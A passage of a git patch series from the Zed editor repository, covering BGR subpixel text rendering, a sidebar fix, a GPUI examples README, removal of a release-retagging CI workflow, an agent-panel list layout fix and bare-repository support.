grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, - _pad: [f32; 2], + is_bgr: u32, + _pad: u32, } #[derive(Clone, Debug)] @@ -146,6 +147,7 @@ pub struct WgpuRenderer { max_buffer_size: u64, storage_buffer_alignment: u64, rendering_params: RenderingParameters, + is_bgr: bool, dual_source_blending: bool, adapter_info: wgpu::AdapterInfo, transparent_alpha_mode: wgpu::CompositeAlphaMode, @@ -475,6 +477,7 @@ impl WgpuRenderer { max_buffer_size, storage_buffer_alignment, rendering_params, + is_bgr: false, dual_source_blending, adapter_info, transparent_alpha_mode, @@ -1016,6 +1019,10 @@ impl WgpuRenderer { resources.path_msaa_view = path_msaa_view; } + pub fn set_subpixel_layout(&mut self, is_bgr: bool) { + self.is_bgr = is_bgr; + } + pub fn update_transparency(&mut self, transparent: bool) { let new_alpha_mode = if transparent { self.transparent_alpha_mode @@ -1147,7 +1154,8 @@ impl WgpuRenderer { gamma_ratios: self.rendering_params.gamma_ratios, grayscale_enhanced_contrast: self.rendering_params.grayscale_enhanced_contrast, subpixel_enhanced_contrast: self.rendering_params.subpixel_enhanced_contrast, - _pad: [0.0; 2], + is_bgr: self.is_bgr as u32, + _pad: 0, }; let globals = GlobalParams { diff --git a/crates/gpui_windows/src/directx_renderer.rs b/crates/gpui_windows/src/directx_renderer.rs index 2955b23429bda6..b5c4d3bf34a946 100644 --- a/crates/gpui_windows/src/directx_renderer.rs +++ b/crates/gpui_windows/src/directx_renderer.rs @@ -32,6 +32,7 @@ pub(crate) struct FontInfo { pub gamma_ratios: [f32; 4], pub grayscale_enhanced_contrast: f32, pub subpixel_enhanced_contrast: f32, + pub is_bgr: bool, } pub(crate) struct DirectXRenderer { @@ -195,6 +196,8 @@ impl DirectXRenderer { viewport_size: [resources.viewport.Width, resources.viewport.Height], grayscale_enhanced_contrast: self.font_info.grayscale_enhanced_contrast, subpixel_enhanced_contrast: self.font_info.subpixel_enhanced_contrast, + is_bgr: self.font_info.is_bgr as u32, + _pad: [0; 3], }], )?; unsafe { @@ -741,6 +744,7 @@ impl DirectXRenderer { gamma_ratios: gpui::get_gamma_correction_ratios(render_params.GetGamma()), grayscale_enhanced_contrast: render_params.GetGrayscaleEnhancedContrast(), subpixel_enhanced_contrast: render_params.GetEnhancedContrast(), + is_bgr: render_params.GetPixelGeometry() == DWRITE_PIXEL_GEOMETRY_BGR, } }) } @@ -961,6 +965,8 @@ struct GlobalParams { viewport_size: [f32; 2], grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, + is_bgr: u32, + _pad: [u32; 3], } struct PipelineState { diff --git a/crates/gpui_windows/src/shaders.hlsl b/crates/gpui_windows/src/shaders.hlsl index 646cfd61cc37c3..d40c7241bd0f23 100644 --- a/crates/gpui_windows/src/shaders.hlsl +++ b/crates/gpui_windows/src/shaders.hlsl @@ -5,6 +5,8 @@ cbuffer GlobalParams: register(b0) { float2 global_viewport_size; float grayscale_enhanced_contrast; float subpixel_enhanced_contrast; + uint is_bgr; + uint3 global_pad; }; Texture2D t_sprite: register(t0); @@ -420,11 +422,11 @@ float4 gradient_color(Background background, // checkerboard float size = background.gradient_angle_or_pattern_height; float2 relative_position = position - bounds.origin; - + float x_index = floor(relative_position.x / size); float y_index = floor(relative_position.y / size); float should_be_colored = (x_index + y_index) % 2.0; - + color = solid_color; color.a *= saturate(should_be_colored); break; @@ -1157,6 +1159,9 @@ MonochromeSpriteVertexOutput subpixel_sprite_vertex(uint vertex_id: SV_VertexID, SubpixelSpriteFragmentOutput subpixel_sprite_fragment(MonochromeSpriteFragmentInput input) { float3 sample = t_sprite.Sample(s_sprite, input.tile_position).rgb; + if (is_bgr) { + sample = sample.bgr; + } float3 alpha_corrected = apply_contrast_and_gamma_correction3(sample, input.color.rgb, subpixel_enhanced_contrast, gamma_ratios); SubpixelSpriteFragmentOutput output; From 804e7dc38eca9ca9636179b8729ca714a7ddea84 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 09:31:24 -0300 Subject: [PATCH 104/231] sidebar: Don't do anything on cmd-click if project is already active (#55190) Prevent flashing the currently selected thread upon cmd-clicking the active project's header. Release Notes: - Fixed a bug where a thread within the currently active project would flash upon cmd-clicking the project header. --- crates/sidebar/src/sidebar.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index aa07b8c3eef1be..12df8a7f1cba14 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -4182,6 +4182,9 @@ impl Sidebar { .and_then(|mw| mw.read(cx).last_active_workspace_for_group(key, cx)) .or_else(|| self.workspace_for_group(key, cx)); if let Some(workspace) = workspace { + if self.is_active_workspace(&workspace, cx) { + return; + } self.activate_workspace(&workspace, window, cx); } else { self.open_workspace_for_group(key, window, cx); From 873a457d42feab4e4d1fe4af7c80e7e8ce326c0a Mon Sep 17 00:00:00 2001 From: sunwukk990 <82385875+grgwuk990@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:36:29 -0400 Subject: [PATCH 105/231] gpui: Add examples index (#55154) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: Christopher Biscardi --- crates/gpui/README.md | 2 +- crates/gpui/examples/README.md | 71 ++++++++++++++++++++++++++++++++++ 2 files changed, 72 insertions(+), 1 deletion(-) create mode 100644 crates/gpui/examples/README.md diff --git a/crates/gpui/README.md b/crates/gpui/README.md index ad3fd37fc55857..e7950de23a8db2 100644 --- a/crates/gpui/README.md +++ b/crates/gpui/README.md @@ -11,7 +11,7 @@ GPUI is still in active development as we work on the Zed code editor, and is st gpui = { version = "*" } ``` - - [Ownership and data flow](_ownership_and_data_flow) +- [Ownership and data flow](_ownership_and_data_flow) Everything in GPUI starts with an `Application`. You can create one with `Application::new()`, and kick off your application by passing a callback to `Application::run()`. Inside this callback, you can create a new window with `App::open_window()`, and register your first root view. See [gpui.rs](https://www.gpui.rs/) for a complete example. diff --git a/crates/gpui/examples/README.md b/crates/gpui/examples/README.md new file mode 100644 index 00000000000000..7fc75e0f5bad7f --- /dev/null +++ b/crates/gpui/examples/README.md @@ -0,0 +1,71 @@ +# GPUI Examples + +Examples can be run from the Zed repository root: + +```sh +cargo run -p gpui --example hello_world +``` + +## Where to start + +- `hello_world` shows the basic shape of a GPUI application: create an + `Application`, open a window, create a root view, and render a `div`. +- `input` demonstrates text input, focus, selections, clipboard actions, and + keyboard bindings. +- `uniform_list` shows how to render a simple virtualized list. +- `testing` demonstrates `#[gpui::test]`, `TestAppContext`, actions, focus, and + window-based tests. + +## Layout and styling + +- `grid_layout` demonstrates CSS-grid-style layout. +- `opacity` demonstrates opacity styling. +- `pattern` shows patterned backgrounds. +- `shadow` demonstrates box shadows. +- `text` shows styled text rendering. +- `text_layout` demonstrates text alignment, decoration, weights, and wrapping. +- `text_wrapper` shows wrapping text content. + +## Interaction + +- `anchor` demonstrates anchored positioning. +- `data_table` combines virtualized list rendering with table-style rows and a + custom scrollbar. +- `drag_drop` shows draggable elements and drop targets. +- `focus_visible` demonstrates keyboard-visible focus styling. +- `mouse_pressure` demonstrates pressure-sensitive pointer input where supported. +- `popover` shows floating layers with `deferred` and `anchored`. +- `scrollable` demonstrates scrollable content. +- `tab_stop` shows keyboard tab navigation. + +## Images, drawing, and animation + +- `animation` demonstrates GPUI animations and animated SVG transforms. +- `gif_viewer` shows GIF rendering. +- `gradient` demonstrates linear gradients and color spaces. +- `image` shows local and remote image loading, image sizing, and asset setup. +- `image_gallery` demonstrates image caching and loading remote images. +- `image_loading` shows image loading states and asset loading. +- `painting` demonstrates custom drawing with paths and canvas. +- `svg` shows SVG rendering. + +## Windows and application behavior + +- `move_entity_between_windows` shows moving an entity between windows. +- `on_window_close_quit` demonstrates quitting when a window closes. +- `set_menus` shows application menu setup. +- `window` demonstrates creating normal, dialog, popup, and floating windows. +- `window_positioning` demonstrates window bounds and placement. +- `window_shadow` demonstrates window shadow styling. + +## Specialized examples + +These examples are useful when working on GPUI itself, but they may not be the +best starting point for new applications: + +- `active_state_bug` is a focused active-state reproduction. +- `layer_shell` demonstrates Linux layer-shell windows. +- `list_example` demonstrates bottom-aligned list state and scrollbar behavior. +- `ownership_post` supports the ownership and data-flow documentation. +- `paths_bench` is a path rendering benchmark. +- `tree` renders a deep tree of nested elements. From e39e061ed303cfec039ecc00fe69c3e051aea62b Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Wed, 29 Apr 2026 15:13:37 +0200 Subject: [PATCH 106/231] ci: Remove release retagging support (#55199) From now on, we will instead just make another patch version bump. That has the advantage that tags will actually always only be applied to the version bump and not some random change as well as us being able to prohibit updates of tag refs for the Zed Zippy identity as well. Release Notes: - N/A --- .github/workflows/bump_patch_version.yml | 10 -- .github/workflows/retag_release.yml | 88 --------------- script/retag-release | 38 ------- tooling/xtask/src/tasks/workflows.rs | 2 - .../src/tasks/workflows/bump_patch_version.rs | 13 --- .../src/tasks/workflows/retag_release.rs | 100 ------------------ 6 files changed, 251 deletions(-) delete mode 100644 .github/workflows/retag_release.yml delete mode 100755 script/retag-release delete mode 100644 tooling/xtask/src/tasks/workflows/retag_release.rs diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index a12a1f5e43f52b..3618d7230f79b4 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -50,16 +50,6 @@ jobs: echo "version=$version" echo "tag_suffix=$tag_suffix" } >> "$GITHUB_OUTPUT" - - name: bump_patch_version::run_bump_patch_version::verify_prior_release_exists - run: | - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" != "200" ]]; then - echo "::error::version $VERSION has not been released on $CHANNEL yet (HTTP $status) — bump the patch version only after the current version is released" - exit 1 - fi - env: - CHANNEL: ${{ steps.channel.outputs.channel }} - VERSION: ${{ steps.channel.outputs.version }} - name: steps::install_cargo_edit uses: taiki-e/install-action@02cc5f8ca9f2301050c0c099055816a41ee05507 with: diff --git a/.github/workflows/retag_release.yml b/.github/workflows/retag_release.yml deleted file mode 100644 index 0cd3710ba358ad..00000000000000 --- a/.github/workflows/retag_release.yml +++ /dev/null @@ -1,88 +0,0 @@ -# Generated from xtask::workflows::retag_release -# Rebuild with `cargo xtask workflows`. -name: retag_release -on: - workflow_dispatch: - inputs: - branch: - description: Release branch to re-tag (e.g. v0.180.x) - required: true - type: string -jobs: - run_retag_release: - if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') - runs-on: namespace-profile-16x32-ubuntu-2204 - steps: - - id: generate-token - name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 - with: - app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} - private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - - name: steps::checkout_repo - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd - with: - clean: false - ref: ${{ inputs.branch }} - token: ${{ steps.generate-token.outputs.token }} - - id: info - name: retag_release::run_retag_release::resolve_tag - run: | - if [[ ! "$BRANCH" =~ ^v[0-9]+\.[0-9]{1,3}\.x$ ]]; then - echo "::error::branch '$BRANCH' does not match the release branch pattern v[N].[N].x" - exit 1 - fi - - channel="$(cat crates/zed/RELEASE_CHANNEL)" - - tag_suffix="" - case $channel in - stable) - ;; - preview) - tag_suffix="-pre" - ;; - *) - echo "::error::must be run on a stable or preview release branch" - exit 1 - ;; - esac - - version=$(script/get-crate-version zed) - - { - echo "channel=$channel" - echo "version=$version" - echo "tag_suffix=$tag_suffix" - echo "head_sha=$(git rev-parse HEAD)" - } >> "$GITHUB_OUTPUT" - env: - BRANCH: ${{ inputs.branch }} - - name: retag_release::run_retag_release::verify_no_existing_release - run: | - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" == "200" ]]; then - echo "::error::version $VERSION is already released on $CHANNEL — cannot re-tag a released version" - exit 1 - fi - env: - CHANNEL: ${{ steps.info.outputs.channel }} - VERSION: ${{ steps.info.outputs.version }} - - name: steps::update_tag - uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b - with: - script: | - github.rest.git.updateRef({ - owner: context.repo.owner, - repo: context.repo.repo, - ref: 'tags/v${{ steps.info.outputs.version }}${{ steps.info.outputs.tag_suffix }}', - sha: '${{ steps.info.outputs.head_sha }}', - force: true - }) - github-token: ${{ steps.generate-token.outputs.token }} -concurrency: - group: ${{ github.workflow }}-${{ inputs.branch }} - cancel-in-progress: true -defaults: - run: - shell: bash -euxo pipefail {0} diff --git a/script/retag-release b/script/retag-release deleted file mode 100755 index f7097e19941ba0..00000000000000 --- a/script/retag-release +++ /dev/null @@ -1,38 +0,0 @@ -#!/usr/bin/env bash - -set -eu - -usage() { - echo "Usage: $0 " - echo "" - echo "Re-tags the HEAD of a release branch by force-updating the tag." - echo "This is useful when commits were added to a release branch after" - echo "tagging but before the release was published." - echo "" - echo "Arguments:" - echo " branch Release branch name (e.g. v0.180.x)" - exit 1 -} - -branch="${1:-}" - -if [[ -z "$branch" ]]; then - usage -fi - -which gh > /dev/null 2>&1 || { - echo "error: GitHub CLI (gh) is required but not installed." >&2 - echo "Install it with: brew install gh" >&2 - exit 1 -} - -echo "Triggering retag_release workflow:" -echo " branch: $branch" -echo "" - -gh workflow run retag_release.yml \ - -f branch="$branch" - -echo "" -echo "Workflow triggered. Monitor progress at:" -echo " https://github.com/zed-industries/zed/actions/workflows/retag_release.yml" diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 69dd1b3d34ed24..2e21363bb65003 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -23,7 +23,6 @@ mod extensions; mod nix_build; mod publish_extension_cli; mod release_nightly; -mod retag_release; mod run_bundling; mod release; @@ -211,7 +210,6 @@ pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(publish_extension_cli::publish_extension_cli), WorkflowFile::zed(release::release), WorkflowFile::zed(release_nightly::release_nightly), - WorkflowFile::zed(retag_release::retag_release), WorkflowFile::zed(run_agent_evals::run_cron_unit_evals), WorkflowFile::zed(run_agent_evals::run_unit_evals), WorkflowFile::zed(run_bundling::run_bundling), diff --git a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs index a657e77f3d0329..fcff7418a2530c 100644 --- a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs +++ b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs @@ -56,18 +56,6 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .id("channel") } - fn verify_prior_release_exists() -> Step { - named::bash(indoc::indoc! {r#" - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" != "200" ]]; then - echo "::error::version $VERSION has not been released on $CHANNEL yet (HTTP $status) — bump the patch version only after the current version is released" - exit 1 - fi - "#}) - .add_env(("CHANNEL", "${{ steps.channel.outputs.channel }}")) - .add_env(("VERSION", "${{ steps.channel.outputs.version }}")) - } - fn bump_version() -> Step { named::bash(indoc::indoc! {r#" version="$(cargo set-version -p zed --bump patch 2>&1 | sed 's/.* //')" @@ -96,7 +84,6 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .add_step(authenticate) .add_step(checkout_branch(branch, &token)) .add_step(channel_step) - .add_step(verify_prior_release_exists()) .add_step(steps::install_cargo_edit()) .add_step(bump_version_step) .add_step(commit_step) diff --git a/tooling/xtask/src/tasks/workflows/retag_release.rs b/tooling/xtask/src/tasks/workflows/retag_release.rs deleted file mode 100644 index 98296a8f0432b1..00000000000000 --- a/tooling/xtask/src/tasks/workflows/retag_release.rs +++ /dev/null @@ -1,100 +0,0 @@ -use gh_workflow::*; - -use crate::tasks::workflows::{ - runners, - steps::{self, CheckoutStep, CommonJobConditions, named}, - vars::{StepOutput, WorkflowInput}, -}; - -pub fn retag_release() -> Workflow { - let branch = WorkflowInput::string("branch", None) - .description("Release branch to re-tag (e.g. v0.180.x)"); - let retag_job = run_retag_release(&branch); - named::workflow() - .on(Event::default() - .workflow_dispatch(WorkflowDispatch::default().add_input(branch.name, branch.input()))) - .concurrency( - Concurrency::new(Expression::new(format!( - "${{{{ github.workflow }}}}-{branch}" - ))) - .cancel_in_progress(true), - ) - .add_job(retag_job.name, retag_job.job) -} - -fn run_retag_release(branch: &WorkflowInput) -> steps::NamedJob { - fn checkout_branch(branch: &WorkflowInput, token: &StepOutput) -> CheckoutStep { - steps::checkout_repo() - .with_token(token) - .with_ref(branch.to_string()) - } - - fn resolve_tag(branch: &WorkflowInput) -> Step { - named::bash(indoc::indoc! {r#" - if [[ ! "$BRANCH" =~ ^v[0-9]+\.[0-9]{1,3}\.x$ ]]; then - echo "::error::branch '$BRANCH' does not match the release branch pattern v[N].[N].x" - exit 1 - fi - - channel="$(cat crates/zed/RELEASE_CHANNEL)" - - tag_suffix="" - case $channel in - stable) - ;; - preview) - tag_suffix="-pre" - ;; - *) - echo "::error::must be run on a stable or preview release branch" - exit 1 - ;; - esac - - version=$(script/get-crate-version zed) - - { - echo "channel=$channel" - echo "version=$version" - echo "tag_suffix=$tag_suffix" - echo "head_sha=$(git rev-parse HEAD)" - } >> "$GITHUB_OUTPUT" - "#}) - .id("info") - .add_env(("BRANCH", branch.to_string())) - } - - fn verify_no_existing_release() -> Step { - named::bash(indoc::indoc! {r#" - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" == "200" ]]; then - echo "::error::version $VERSION is already released on $CHANNEL — cannot re-tag a released version" - exit 1 - fi - "#}) - .add_env(("CHANNEL", "${{ steps.info.outputs.channel }}")) - .add_env(("VERSION", "${{ steps.info.outputs.version }}")) - } - - let (authenticate, token) = steps::authenticate_as_zippy().into(); - let resolve_step = resolve_tag(branch); - let version = StepOutput::new(&resolve_step, "version"); - let tag_suffix = StepOutput::new(&resolve_step, "tag_suffix"); - let head_sha = StepOutput::new(&resolve_step, "head_sha"); - - named::job( - Job::default() - .with_repository_owner_guard() - .runs_on(runners::LINUX_XL) - .add_step(authenticate) - .add_step(checkout_branch(branch, &token)) - .add_step(resolve_step) - .add_step(verify_no_existing_release()) - .add_step(steps::update_ref( - steps::GitRef::tag(format!("v{version}{tag_suffix}")), - &head_sha, - &token, - true, - )), - ) -} From f99cd607910dcf1a7aef16964bdd95f240b2206e Mon Sep 17 00:00:00 2001 From: Oleksandr Kholiavko <43780952+HalavicH@users.noreply.github.com> Date: Wed, 29 Apr 2026 15:14:01 +0200 Subject: [PATCH 107/231] agent_ui: Adjust edited files and plan lists to fit content height (#55189) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When a plan contains many tasks (or the edited-files list is long), items were being visually compressed into the fixed-height container rather than scrolling. image_2026-04-28_20-17-43 Asking an agent to "create a plan with 20 tasks" is an easy repro. **Root cause** Both lists used a `v_flex()` as their scroll container, and flexbox children have `flex-shrink: 1` by default. When the container hits `max_h`, the flex algorithm compresses all children to fit instead of overflowing into the scroll region — resulting in 20 items crammed into 160px. **Fix** Separate the scroll boundary from the flex layout. A plain `div` (non-flex) as the outer scroll container lets its inner `v_flex` size naturally — content then overflows the bounded `div` and scrolling works correctly. Result: image_2026-04-29_10-09-24 Closes issue #54633. > What's missing: vertical scrollbar, as it requires large refactoring due to double mutable borrowing of `cx` (the second introduced by scroll handle), which will slowdown review of this pr Release Notes: - Fixed plan and edited-files lists in the agent panel being squashed when they contain many items --- .../src/conversation_view/thread_view.rs | 132 +++++++++--------- 1 file changed, 67 insertions(+), 65 deletions(-) diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index ed42c576a36db8..44b51bb491ed5e 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -2295,11 +2295,9 @@ impl ThreadView { .id("edited_files_list") .max_h_40() .overflow_y_scroll() - .children( - sorted_buffers - .into_iter() - .enumerate() - .flat_map(|(index, (buffer, diff))| { + .child( + v_flex().children(sorted_buffers.into_iter().enumerate().flat_map( + |(index, (buffer, diff))| { let file = buffer.read(cx).file()?; let path = file.path(); let path_style = file.path_style(cx); @@ -2402,7 +2400,8 @@ impl ThreadView { .child(buttons); Some(element) - }), + }, + )), ) .into_any_element() } @@ -2786,66 +2785,69 @@ impl ThreadView { .id("plan_items_list") .max_h_40() .overflow_y_scroll() - .children(plan.entries.iter().enumerate().flat_map(|(index, entry)| { - let entry_bg = cx.theme().colors().editor_background; - let tooltip_text: SharedString = entry.content.read(cx).source().to_string().into(); + .child( + v_flex().children(plan.entries.iter().enumerate().flat_map(|(index, entry)| { + let entry_bg = cx.theme().colors().editor_background; + let tooltip_text: SharedString = + entry.content.read(cx).source().to_string().into(); - Some( - h_flex() - .id(("plan_entry_row", index)) - .py_1() - .px_2() - .gap_2() - .justify_between() - .relative() - .bg(entry_bg) - .when(index < plan.entries.len() - 1, |parent| { - parent.border_color(cx.theme().colors().border).border_b_1() - }) - .overflow_hidden() - .child( - h_flex() - .id(("plan_entry", index)) - .gap_1p5() - .min_w_0() - .text_xs() - .text_color(cx.theme().colors().text_muted) - .child(match entry.status { - acp::PlanEntryStatus::InProgress => { - Icon::new(IconName::TodoProgress) - .size(IconSize::Small) - .color(Color::Accent) - .with_rotate_animation(2) - .into_any_element() - } - acp::PlanEntryStatus::Completed => { - Icon::new(IconName::TodoComplete) - .size(IconSize::Small) - .color(Color::Success) - .into_any_element() - } - acp::PlanEntryStatus::Pending | _ => { - Icon::new(IconName::TodoPending) - .size(IconSize::Small) - .color(Color::Muted) - .into_any_element() - } - }) - .child(MarkdownElement::new( - entry.content.clone(), - plan_label_markdown_style(&entry.status, window, cx), - )), - ) - .child(div().absolute().top_0().right_0().h_full().w_8().bg( - linear_gradient( - 90., - linear_color_stop(entry_bg, 1.), - linear_color_stop(entry_bg.opacity(0.), 0.), - ), - )) - .tooltip(Tooltip::text(tooltip_text)), - ) - })) + Some( + h_flex() + .id(("plan_entry_row", index)) + .py_1() + .px_2() + .gap_2() + .justify_between() + .relative() + .bg(entry_bg) + .when(index < plan.entries.len() - 1, |parent| { + parent.border_color(cx.theme().colors().border).border_b_1() + }) + .overflow_hidden() + .child( + h_flex() + .id(("plan_entry", index)) + .gap_1p5() + .min_w_0() + .text_xs() + .text_color(cx.theme().colors().text_muted) + .child(match entry.status { + acp::PlanEntryStatus::InProgress => { + Icon::new(IconName::TodoProgress) + .size(IconSize::Small) + .color(Color::Accent) + .with_rotate_animation(2) + .into_any_element() + } + acp::PlanEntryStatus::Completed => { + Icon::new(IconName::TodoComplete) + .size(IconSize::Small) + .color(Color::Success) + .into_any_element() + } + acp::PlanEntryStatus::Pending | _ => { + Icon::new(IconName::TodoPending) + .size(IconSize::Small) + .color(Color::Muted) + .into_any_element() + } + }) + .child(MarkdownElement::new( + entry.content.clone(), + plan_label_markdown_style(&entry.status, window, cx), + )), + ) + .child(div().absolute().top_0().right_0().h_full().w_8().bg( + linear_gradient( + 90., + linear_color_stop(entry_bg, 1.), + linear_color_stop(entry_bg.opacity(0.), 0.), + ), + )) + .tooltip(Tooltip::text(tooltip_text)), + ) + })), + ) .into_any_element() } From af7c0e80811bc47cb6657460dcc2d50925e7b57f Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Wed, 29 Apr 2026 06:16:37 -0700 Subject: [PATCH 108/231] Improve bare repo support (#55153) Fixes https://github.com/zed-industries/zed/issues/54830 This fixes a bugs where * when there's no main worktree, we treated the first linked worktree as main * the titlebar and sidebar showed two different things when opening a linked wortree directly When there's no main worktree, our "project group key" will be the bare repo path. For displaying this to the user, we try to present something meaningful: * If the bare repo is `foo.git`, we'll say "foo" * If the bare repo is "bar/.bare", we'll "bar" Release Notes: - Fixed bugs in Zed's sidebar and titlebar when editing in git worktrees created from bare repositories. --- .../agent_ui/src/thread_worktree_archive.rs | 2 +- .../20221109000000_test_schema.sql | 2 + .../migrations/20251208000000_test_schema.sql | 6 +- crates/collab/src/db/queries/projects.rs | 7 +- crates/collab/src/db/queries/rooms.rs | 3 +- .../src/db/tables/project_repository.rs | 2 + crates/collab/tests/integration/git_tests.rs | 63 ++++-- crates/git/src/repository.rs | 60 +++--- crates/project/src/git_store.rs | 181 +++++++++++++----- crates/project/src/project.rs | 11 +- crates/project/src/worktree_store.rs | 2 +- crates/project/tests/integration/git_store.rs | 26 ++- .../tests/integration/project_tests.rs | 8 +- crates/proto/proto/git.proto | 4 +- crates/sidebar/src/sidebar.rs | 22 ++- crates/sidebar/src/sidebar_tests.rs | 6 +- crates/title_bar/src/title_bar.rs | 33 ++-- 17 files changed, 312 insertions(+), 126 deletions(-) diff --git a/crates/agent_ui/src/thread_worktree_archive.rs b/crates/agent_ui/src/thread_worktree_archive.rs index bc2dfdd07114dc..73b0a426b3097b 100644 --- a/crates/agent_ui/src/thread_worktree_archive.rs +++ b/crates/agent_ui/src/thread_worktree_archive.rs @@ -160,7 +160,7 @@ pub fn build_root_plan( // Only linked worktrees can be archived to disk via `git worktree remove`. // Main worktrees must be left alone — git refuses to remove them. let (linked_snapshot, repo) = linked_repo?; - let main_repo_path = linked_snapshot.original_repo_abs_path.to_path_buf(); + let main_repo_path = linked_snapshot.main_worktree_abs_path()?.to_path_buf(); // Only archive worktrees that live inside the Zed-managed worktrees // directory (configured via `git.worktree_directory`). Worktrees the diff --git a/crates/collab/migrations.sqlite/20221109000000_test_schema.sql b/crates/collab/migrations.sqlite/20221109000000_test_schema.sql index 75175372f24a83..0ef44682a11a60 100644 --- a/crates/collab/migrations.sqlite/20221109000000_test_schema.sql +++ b/crates/collab/migrations.sqlite/20221109000000_test_schema.sql @@ -112,6 +112,8 @@ CREATE TABLE "project_repositories" ( "remote_upstream_url" VARCHAR, "remote_origin_url" VARCHAR, "linked_worktrees" VARCHAR, + "repository_dir_abs_path" VARCHAR, + "common_dir_abs_path" VARCHAR, PRIMARY KEY (project_id, id) ); diff --git a/crates/collab/migrations/20251208000000_test_schema.sql b/crates/collab/migrations/20251208000000_test_schema.sql index 0110dd149b1143..3a3329af776686 100644 --- a/crates/collab/migrations/20251208000000_test_schema.sql +++ b/crates/collab/migrations/20251208000000_test_schema.sql @@ -308,7 +308,9 @@ CREATE TABLE public.project_repositories ( merge_message character varying, remote_upstream_url character varying, remote_origin_url character varying, - linked_worktrees text + linked_worktrees text, + repository_dir_abs_path character varying, + common_dir_abs_path character varying ); CREATE TABLE public.project_repository_statuses ( @@ -333,7 +335,7 @@ CREATE TABLE public.projects ( host_connection_id integer, host_connection_server_id integer, windows_paths boolean DEFAULT false, - features text NOT NULL DEFAULT '' + features text DEFAULT ''::text NOT NULL ); CREATE SEQUENCE public.projects_id_seq diff --git a/crates/collab/src/db/queries/projects.rs b/crates/collab/src/db/queries/projects.rs index cf2f5913a76b46..5afcd69db0ff85 100644 --- a/crates/collab/src/db/queries/projects.rs +++ b/crates/collab/src/db/queries/projects.rs @@ -379,6 +379,8 @@ impl Database { merge_message: ActiveValue::set(update.merge_message.clone()), remote_upstream_url: ActiveValue::set(update.remote_upstream_url.clone()), remote_origin_url: ActiveValue::set(update.remote_origin_url.clone()), + repository_dir_abs_path: ActiveValue::set(update.repository_dir_abs_path.clone()), + common_dir_abs_path: ActiveValue::set(update.common_dir_abs_path.clone()), linked_worktrees: ActiveValue::Set(Some( serde_json::to_string(&update.linked_worktrees).unwrap(), )), @@ -396,6 +398,8 @@ impl Database { project_repository::Column::CurrentMergeConflicts, project_repository::Column::HeadCommitDetails, project_repository::Column::MergeMessage, + project_repository::Column::RepositoryDirAbsPath, + project_repository::Column::CommonDirAbsPath, project_repository::Column::LinkedWorktrees, ]) .to_owned(), @@ -893,7 +897,8 @@ impl Database { stash_entries: Vec::new(), remote_upstream_url: db_repository_entry.remote_upstream_url.clone(), remote_origin_url: db_repository_entry.remote_origin_url.clone(), - original_repo_abs_path: Some(db_repository_entry.abs_path), + repository_dir_abs_path: db_repository_entry.repository_dir_abs_path, + common_dir_abs_path: db_repository_entry.common_dir_abs_path, linked_worktrees: db_repository_entry .linked_worktrees .as_deref() diff --git a/crates/collab/src/db/queries/rooms.rs b/crates/collab/src/db/queries/rooms.rs index b17721945f8ea4..b86a0a4206adfd 100644 --- a/crates/collab/src/db/queries/rooms.rs +++ b/crates/collab/src/db/queries/rooms.rs @@ -800,7 +800,8 @@ impl Database { stash_entries: Vec::new(), remote_upstream_url: db_repository.remote_upstream_url.clone(), remote_origin_url: db_repository.remote_origin_url.clone(), - original_repo_abs_path: Some(db_repository.abs_path), + repository_dir_abs_path: db_repository.repository_dir_abs_path, + common_dir_abs_path: db_repository.common_dir_abs_path, linked_worktrees: db_repository .linked_worktrees .as_deref() diff --git 